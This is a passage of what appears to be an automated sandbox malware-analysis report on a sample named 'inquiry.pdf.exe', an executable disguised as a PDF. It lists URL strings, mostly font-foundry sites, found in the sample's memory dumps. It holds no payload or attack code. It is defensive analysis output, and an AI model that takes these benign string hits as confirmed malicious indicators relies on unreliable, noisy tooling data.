Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln-uO
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: inquiry.pdf.exe, 00000000.00000003.268808715.000000000652D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268232591.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268609542.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268447326.000000000652B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html4j-
Source: inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlI
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: inquiry.pdf.exe, 00000000.00000003.267507239.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267605251.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersZ
Source: inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersl
Source: inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comB.TTFd
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271546551.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271631731.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271758905.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comI.TTF6
Source: inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comR.TTF
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalsF5
Source: inquiry.pdf.exe, 00000000.00000003.298903445.000000000654F000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.306760136.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298246614.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.312562087.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297909896.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298549688.000000000654E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comav
Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdv
Source: inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdva
Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comm
Source: inquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comony/O
Source: inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comrz
Source: inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comsief
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: inquiry.pdf.exe, 00000000.00000003.261291352.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn&
Source: inquiry.pdf.exe, 00000000.00000003.261470904.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261541124.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261568725.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261532259.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn4j4
Source: inquiry.pdf.exe, 00000000.00000003.261220547.0000000006521000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnQ
Source: inquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnT
Source: inquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnt-b
Source: inquiry.pdf.exe, 00000000.00000003.274291319.000000000654B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/6
Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/O
Source: inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0=
Source: inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0f
Source: inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/k-u
Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263345727.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263304641.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263400744.0000000006549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/nyg
Source: inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/s-e
Source: inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263571211.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263953288.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263537033.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263619076.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.263868688.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ueT
Source: inquiry.pdf.exe, 00000000.00000003.263230663.000000000654A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/v
